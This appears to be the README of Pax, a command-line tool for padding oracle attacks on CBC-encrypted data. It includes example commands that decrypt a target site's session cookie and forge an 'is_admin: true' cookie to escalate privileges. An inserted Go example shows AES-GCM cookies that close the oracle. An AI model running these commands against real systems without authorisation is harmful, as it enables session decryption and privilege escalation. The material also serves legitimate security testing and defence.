
liamg / Pax

Licence: MIT
💀 🔓 CLI tool for PKCS7 padding oracle attacks


pax


Exploit padding oracles for fun and profit!

Pax (PAdding oracle eXploiter) is a tool for exploiting padding oracles in order to:

  1. Obtain plaintext for a given piece of CBC encrypted data.
  2. Obtain encrypted bytes for a given piece of plaintext, using the unknown encryption algorithm used by the oracle.

This can be used to disclose encrypted session information, and often to bypass authentication, elevate privileges and to execute code remotely by encrypting custom plaintext and writing it back to the server.

As always, this tool should only be used on systems you own and/or have permission to probe!

Installation

Download from releases, or install with Go:

go get -u github.com/liamg/pax/cmd/pax

Example Usage

If you find a suspected oracle, where the encrypted data is stored inside a cookie named SESS, you can use the following:

pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"

This will hopefully give you some plaintext, perhaps something like:

 {"user_id": 456, "is_admin": false}

It looks like you could elevate your privileges here!

You can attempt to do so by first generating your own encrypted data that the oracle will decrypt back to some sneaky plaintext:

pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'

This will spit out another base64 encoded set of encrypted data, perhaps something like:

dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

Now you can open your browser and set the value of the SESS cookie to the above value. Loading the original oracle page, you should now see you are elevated to admin level.
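
The forged is_admin cookie above is accepted only because the server decrypts CBC data without authenticating it and reveals whether the padding was valid. As an added example (not part of Pax or its README), here is a cookie format in Go that closes the oracle by using authenticated encryption (AES-GCM) in place of bare CBC. The names newGCM, sealSession and openSession are hypothetical and the all-zero key is a constructed demo value.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
)

var errInvalid = errors.New("invalid session") // the only failure a client ever sees

func newGCM(key [32]byte) cipher.AEAD {
	blk, _ := aes.NewCipher(key[:]) // a 32-byte key is always valid (AES-256)
	g, _ := cipher.NewGCM(blk)      // cannot fail for an AES block cipher
	return g
}

// sealSession returns nonce || ciphertext || tag.
func sealSession(g cipher.AEAD, pt []byte) []byte {
	nonce := make([]byte, g.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		panic(err)
	}
	return g.Seal(nonce, nonce, pt, nil)
}

// openSession verifies the tag before any plaintext or padding is examined.
func openSession(g cipher.AEAD, tok []byte) ([]byte, error) {
	if ns := g.NonceSize(); len(tok) >= ns {
		if pt, err := g.Open(nil, tok[:ns], tok[ns:], nil); err == nil {
			return pt, nil
		}
	}
	return nil, errInvalid
}

func main() {
	g := newGCM([32]byte{}) // constructed all-zero demo key; use a random secret
	tok := sealSession(g, []byte(`{"user_id": 456, "is_admin": false}`))
	accepted := 0
	for i := range tok { // flip one bit at every byte position of the cookie
		tok[i] ^= 1
		if _, err := openSession(g, tok); err == nil {
			accepted++
		}
		tok[i] ^= 1
	}
	fmt.Println("modified tokens accepted:", accepted)
}
```

Because every modified token fails with the same error before decryption output is used, the server's responses give a client nothing to distinguish one guess from another.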

How does this work?

The following are great guides on how this attack works:
